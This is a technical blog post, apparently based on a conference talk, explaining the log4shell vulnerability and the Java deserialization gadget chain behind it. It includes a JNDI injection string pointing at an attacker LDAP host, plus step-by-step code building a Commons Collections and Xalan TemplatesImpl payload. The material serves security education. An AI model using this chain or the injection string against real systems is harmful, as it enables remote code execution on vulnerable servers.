log4shell - A nightmare before christmas

2021-12-12

TL;DR

I presented the following insights with my dear colleague Christian Kumpe at different conferences, so, if you prefer to listen and watch a demo, rather than reading through this huge wall of text and code, you may find a recording in the links section.

Long story short, log4shell CVE-2021-44228

is a critical remote code execution vulnerability in log4j2
abuses JNDI lookups to load attacker-controlled code via LDAP
log4j is just the transport for a deserialization attack
No authentication required, trivial to exploit
One of the most severe supply-chain vulnerabilities ever discovered

Post mortem

So, it’s beginning of December 2021. Story frequency slows down, the amount of bug reports is decreasing and developers all over the world start to relax and focus on the finer things in the software development world.

Until somewhere between 25^th of November and 9^th of December.

One day after, CVE-2021-44228 was reported, the problem slowly leaked into the tech channels and log files showed the first suspicious entries. At this point, the mainstream media engaged, the internet exploded and so did our log files.

A typical log entry of a log4shell attack

Enough gossip, let me explain what’s behind all this.

Management summary

For the exploit to work an attacker needs at least an LDAP server under their control and reachable from the victims java application. A JNDI lookup statement is then injected into the vulnerable application and the LDAP answers then with either

a code location - which needs another webserver serving malicious code
or
directly with serialized malicious code - the smarter approach, though, it also requires a deserialization attack.

A diagram showing the two possible attack vectors

In this article, I’ll focus on the latter, the details of the deserialization.

The tale of Bobby Tables

The vulnerabilities entry point is log4js string substitution. String fragments surrounded by ${...} are evaluated by its StrSubstitutor, which triggers is then able to trigger lookups, i.e. via the JndiLookup.

Long story short, the attacker needs to place a string like ${jndi:ldap://malicious.ldap.net:1389/evilCode} inside a log statement. And, to be honest, almost everyone has written code allowing this:

public class VulnerableLogin {

    private static final Logger logger = LogManager.getLogger(VulnerableLogin.class);
 
    public boolean processLogin(String username, String ...) {
        
        boolean loginSuccessful = false;
        
        // do very secure login things
        
        if(!loginSuccessful) {
            logger.error("Unable to authenticate user " + username);
        }
        
        return loginSuccessful;
    }
}

Remember Bobby Tables?

At this point, log4j executes the lookup and the malicious code is already on the target system. In the next section, I’ll cover, how to get this code into the classloader.

Entering the target JVM

To start off, let’s have a quick look on how to get code into the classloader. If you prefer to skip this excursus, you can follow the actual exploit at Understanding JNDI LDAP entries.

The initial test case is quite simple, a Hello World! with a slight difference, a static initializer.

public class Step1_HelloWorld {
	 
    static {
        System.out.println("Static initializer of Step1_HelloWorld");
    }

    public static void main(String[] args) {
        System.out.println("Hello World!");
    }
}

As of JLS 12.4. Initialization of Classes and Interfaces, we’ll use this initializer as an indicator for successful initialization:

Initialization of a class consists of executing its static initializers and the initializers for static fields (class variables) declared in the class.

Execution will therefore result in the following output:

Output

1 2	Static initializer of Step1_HelloWorld Hello World!

With Class.forName("..."), we’re now able to load the class into the classloader with an equal output:

import java.lang.reflect.Method;
	 
public class Step2_ClassForName {
 
    public static void main(String[] args) throws Exception {
        Class<?> helloWorldClass = Class.forName("io.wende...Step1_HelloWorld");
 
        Method mainMethod = helloWorldClass.getMethod("main", String[].class);
        mainMethod.invoke(null, (Object) new String[0]);
    }
}

Output

1 2	Static initializer of Step1_HelloWorld Hello World!

This method only works, if the class to load is in the classpath; which unfortunately, is not the case when attacking remote JVMs. Though, it’s still possible with the good ol’ overload trick:

import java.io.File;
import java.lang.reflect.Method;
import java.nio.file.Files;

public class Step3_ClassForBytes {
 
    public static void main(String[] args) throws Exception {
        byte[] bytes = Files.readAllBytes(new File("target/classes/.../Step1_HelloWorld.class").toPath());
 
        Class<?> helloWorldClass = new OverloadedClassLoader().defineClass(bytes);
 
        Method mainMethod = helloWorldClass.getMethod("main", String[].class);
        mainMethod.invoke(null, (Object) new String[0]);
    }
 
    private static class OverloadedClassLoader extends ClassLoader {
        Class<?> defineClass(byte[] bytes) {
            return defineClass(null, bytes, 0, bytes.length, null);
        }
    }
}

Since ClassLoader.defineClass(...) is marked protected final, we’re not able to directly call it and need to implement it ourselves; again, our output resembles to:

Output

1 2	Static initializer of Step1_HelloWorld Hello World!

Understanding JNDI LDAP entries

As mentioned in the management summary, there are two different ways of delivering code via LDAP; using a remote code base or by including the serialized code directly. This results in two possible structures:

	Remote code base	Serialized code
Structure	javaClassName `foo` objectClass `javaNamingReference` javaCodeBase `http://127.0.0.1:8080/` javaFactory `io.wende.log4shell.SimplePayload`	javaClassName `foo` javaSerializedData `ac ed 00 05 73 72 00 3a 63 6f 6d 2e 73 75 6e 2e …`
Requirements	LDAP server needs to be reachable from the victims machine HTTP remote code base needs to be reachable from the victims machine Remote class loading needs to be active (deactivated by default since JDK 1.8u121)	Only the LDAP server needs to be reachable from the victims machine Exploit needs to be triggered at the deserialization of the LDAP payload

Serializing your code

Again, let’s start easy. We’ll create our serializable class with a value to set,

1
2
3

public static class SerializableClass implements Serializable {
    private int value = 0;
}

create an object of this class and serialize it to a file:

SerializableClass serializableObject = new SerializableClass();
serializableObject.value = 42;

try (FileOutputStream file = new FileOutputStream("serialized-data.tmp");
     ObjectOutputStream out = new ObjectOutputStream(file)) {
     out.writeObject(serializableObject);
}

Now, we’re able to read this file and print its value:

try (FileInputStream file = new FileInputStream("serialized-data.tmp");
     ObjectInputStream in = new ObjectInputStream(file)) {

    SerializableClass deserializedObject = (SerializableClass) in.readObject();
    System.out.println("Value of object: " + deserializedObject.value);
}

Output

1	Value of object: 42

But this approach requires the code responsible for deserialization to explicitly execute our code. This will most likely not happen in real life, though, the JDK does offer possibilities:

Classes that require special handling during the serialization and deserialization process must implement special methods with these exact signatures:
private void writeObject…

By implementing these methods, we’re now able to execute code directly at serialization and deserialization of the object:

public static class SerializableClass implements Serializable {
    private int value = 0;

    private void writeObject(ObjectOutputStream out) {
        System.out.println("Execute on serialization");
    }

    private void readObject(ObjectInputStream in) {
        System.out.println("Execute on deserialization");
    }
}

Output

1
2
3

Execute on serialization
Execute on deserialization
Value of object: 42

A possible attack vector emerges

In the previous sections, I went through the several steps of delivering malicious code to the victims application, and it looks like there is a possibility to succeed. Though, as you may have noticed, there are still some problems to solve. Time for a recap:

Steps of a successful attack	Possible approach	Problem
Initial entry-point to the vulnerable application	Injecting arbitrary data via log4js JNDI lookup	✔️ None, working as designed
Deliver malicious code to target to target	Utilize LDAPs HTTP remote code location	⚠️ Additional infrastructure resource needed
	Deliver serialized code in LDAP entry	✔️ None, avoids additional weak link in attack chain
Remote code execution on target	On deserialization	❌ Code is not in classpath
		❌ Execute arbitrary method upon deserialization

The last issue, we now need to tackle, is finding a suitable deserialization attack. As detailed in the last section, private void readObject(ObjectInputStream in) is used in every deserialization, so let’s have a look at the common objects, perhaps we’ll find a flaw to exploit.

A collection, vantage point for success

When taking a look at the source of java.util.HashMap, it looks like it does not serialize its internal data structure, but directly its keys and values. Upon deserialization, this process is reversed; keys and values are deserialized and put back into the maps structure:

java.util.HashMap, shortenend for readability

public class HashMap<K,V> extends AbstractMap<K,V> implements Map<K,V>, Cloneable, Serializable {
    
    private void readObject(java.io.ObjectInputStream s) throws IOException, ClassNotFoundException {
            for (int i = 0; i < mappings; i++) {
                K key = (K) s.readObject();
                V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }
    }

    static final int hash(Object key) {
        int h;
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
    }
}

As the name HashMap already tells us, these maps rely on hash codes of its entries keys. Upon reassembly, this needs to be executed again, see line 7 resp. line 13. This is an important observation we’ll need later:

A HashMap calls the .hashCode() method of its entries keys on deserialization.

Execute methods on deserialization

Step by step, we’ll now try to execute an arbitrary method upon deserialization, at first with the payload in our classpath. Again with this sample class

public static class SerializableClass implements Serializable {
    public void myMethod() {
        System.out.println("Executed myMethod");
    }
}

To trigger the actual method execution, we’ll use a feature of Apaches Commons Collections, the InvokerTransformer. It executes any passed method of the passed class with

a combination of three features of Commons Collections, the

TiedMapEntry
Basically a Map.Entry with an arbitrary key object pointing to a Map- value; here we’ll use our payload object as the key
LazyMap
A map that is able to ‘generate’ map entries on demand
InvokerTransformer
A helper to enable the LazyMap generating map entries

SerializableClass serializableObject = new SerializableClass();

// Executes the passed method on calling .transform()
InvokerTransformer invokerTransformer = new InvokerTransformer("myMethod", new Class[0], new Object[0]);

// Calls the InvokerTransformer to generate map entries lazily
LazyMap lazyMap = LazyMap.lazyMap(new HashMap(), invokerTransformer);
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, serializableObject);

Now, we’ll create a simple HashMap with one entry and replace this entries key with our prepared TiedMapEntry

Map hashMap = new HashMap();
hashMap.put("this key will be replaced by tiedMapEntry", "a value");

// replace key by reflection
Object firstMapEntry = hashMap.entrySet().iterator().next();
ReflectionUtil.setFieldValue(firstMapEntry, "key", tiedMapEntry);

The idea behind this is: As we do remember, upon deserialization, the .hashCode() method of the maps key is called. This key is the LazyMap, calling InvokerTransformer.transform() to generate its value, which then eventually calls our payloads method. The initial replacement of the Map key probably break the maps structure, but we don’t care about this, as long as our code is executed.
Quite smart, isn’t it? Yes, but still, this only works with classpath code.

Instantiating a class from serialized data

Again, we’ll need to utilize classes resp. a library likely to be present in the target application. Apache Xalan is our candidate;
it heavily uses instantiation of bytecode to generate classes for its XSLT transformations. Key players here are the and an implementation of the .

According to the beginning of our journey, the static initializer of a class is executed upon initialization, we’ll use this in our own implementation of Xalans AbstractTranslet:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class TransletPayload extends AbstractTranslet {

    static {
        System.out.println("Payload in static initializer of TransletPayload");
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) {}

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {}
}

The bytecode of this translet can now be packed in Xalans TemplatesImpl and submitted for serialization. On deserialization, we can now trigger our code with TemplateImpl.newTransformer(). This will throw an exception, but, by setting the field value _name, it will be thrown after initialization of the translet.

byte[] classBytes = Files.readAllBytes(new File("io/wende/log4shell/TransletPayload.class").toPath());

TemplatesImpl templates = new TemplatesImpl();
ReflectionUtil.setFieldValue(templates, "_name", "");
ReflectionUtil.setFieldValue(templates, "_bytecodes", new byte[][]{classBytes});

try (FileOutputStream file = new FileOutputStream("serialized-data.tmp"); ObjectOutputStream out = new ObjectOutputStream(file)) {
    out.writeObject(templates);
}

try (FileInputStream file = new FileInputStream("serialized-data.tmp"); ObjectInputStream in = new ObjectInputStream(file)) {
    TemplatesImpl deserializedTemplates = (TemplatesImpl) in.readObject();
    deserializedTemplates.newTransformer();
}

Output

1
2
3

Payload in static initializer of TransletPayload
Exception in thread "main" java.lang.NullPointerException
at …

The last remaining issue is now the call to TemplateImpl.newTransformer() in line 13. To show the least bit of responsibility, I’ll leave it to you - the reader - to solve this with insights of the previous section.

Funeral feast

Wow, what a journey. Again, time for a recap, what did we need to do to inject and execute our code on the target system:

Place the payload in the static initializer of an AbstractTranslet
Pack the bytecode of the translet in a TemplatesImpl
Create an InvokerTransformer calling TemplateImpl.newTransformer()
Add the InvokerTransformer to a LazyMap
Create a TiedMapEntry with the LazyMap as key and the TemplatesImpl as value
Craft a basic HashMap with one entry and manually replace the entries key with the TiedMapEntry
Serialize this map and deliver it in an LDAP response entry
Inject an LDAP JNDI lookup into a vulnerable Java application

Knowing this, I think it’s a pity that mainly log4j was blamed for being the security risk. Yes, it opens the door, but the real breach is the clever combination of common library classes, allowing to initialize external code that is not in the JVMs classpath.

Limitations

As with any other exploit, there are some limitations and preconditions that have to be met. In this particular example, it’s Apache Log4j2 in a version <= 2.14 and the targets JDK in an update version < 1.8u121. The same goes for the common library touchpoints like Apache Commons Collections and Apache Xalan.
Please also note, the approach shown in this post is just one possible way of combining code injection and execution. Especially the deserialization attack detailed in the last few sections is just one flavor, using the most common utility libraries. The approach was constantly improved, changed to other vulnerable libraries and distribution channels (i.e. replaced LDAP with DNS probes or JBoss requests) and I assume, this has not been the last attack of this kind.
Anyway, I admire the cleverness and the persistence needed to create such ingenious constructs.

Links

This blog post is the written summary of a talk I prepared and held together with Christian Kumpe,
Die Technik hinter Log4Shell & Co.. Up to now, it was featured at the following conferences: